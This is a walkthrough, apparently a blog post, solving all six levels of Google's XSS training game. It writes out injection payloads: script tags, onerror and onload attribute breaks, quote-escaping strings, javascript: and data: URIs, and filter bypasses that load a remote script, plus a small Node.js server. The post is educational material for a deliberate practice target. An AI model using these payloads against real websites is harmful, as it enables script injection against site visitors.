Hi friends, this article describes how to play the XSS vulnerability game that Google released a few days ago. The address is here.
In this article I list some interesting solutions found online, covering all of the levels. Let's get started!
Level 1: Hello, world of XSS
Okay, this is simple. There is nothing to say:
<script>alert(1);</script>
Level 2: Persistence is key
Any of the following methods can be used to solve this level:
<a href="test" onclick="javascript:alert(1);">test</a> creates a link (requires interaction with the user).
Load an invalid image (using onerror): no interaction is required.
Load a valid image (using onload): no interaction is required.
Level 3: That sinking feeling...
The page takes the value of window.location.hash and uses it to build the image it loads.
Therefore, we can use the following:
1.jpg' onload='javascript:alert(1);' loads a valid image (using onload): no interaction is required.
Or:
' onerror="alert(1)"> loads an invalid image (using onerror): no interaction is required.
You can also close the attribute and tag and use a script tag:
'><script>alert(1);</script>
Level 4: Context matters
This level can be solved in several different ways:
1')%3Balert('1 (the semicolon must be URL-encoded; otherwise it is filtered out).
The single quotation marks can be encoded as well:
1%27)%3Balert(%271
The | (logical OR) operator can also be used:
1')|alert('1
The following also works, without any encoding or operator:
1');alert(1);//
Level 5: Breaking protocol
At this level, characters such as double quotation marks (") are filtered. We only need to use:
javascript:alert(1); and after clicking the link, the alert box is displayed.
Level 6: Follow the rabbit
At the last level, we can use data:text/javascript as follows:
data:text/javascript,alert(1);
The regular expression is also case sensitive, so we can use "HTTP" instead of "http" and load a remote script like this:
HTTP://127.0.0.1:8000
Or add a space at the beginning of the URL:
[space]http://127.0.0.1:8000
The server's root page must return some JavaScript, such as alert(1).
I have seen that some people cannot load the script over HTTP, because they are using the HTTPS version of the game. In this case, you can create a simple HTTPS server yourself (for example with Node.js).
var https = require('https');
var fs = require('fs');

// TLS key and certificate for the local test server (a self-signed pair is enough).
var hskey = fs.readFileSync('server.key');
var hscert = fs.readFileSync('server.crt');
var options = { key: hskey, cert: hscert };

// Answer every request with a small JavaScript body so the page can load it as a script.
https.createServer(options, function (req, res) {
  res.writeHead(200);
  res.end("alert(1);");
}).listen(8000);
A simple HTTPS server implemented with Node.js
In both cases, a protocol-relative URL (one that starts with //) bypasses the filter:
//
For example, if you are running your own HTTPS server, you can inject the following:
//127.0.0.1:8000
Done.
I hope readers gain something from this article. The game is quite interesting, and I look forward to its sequels.
Address: http://paulsec.github.io/blog/2014/06/02/diving-into-xss-googles-game/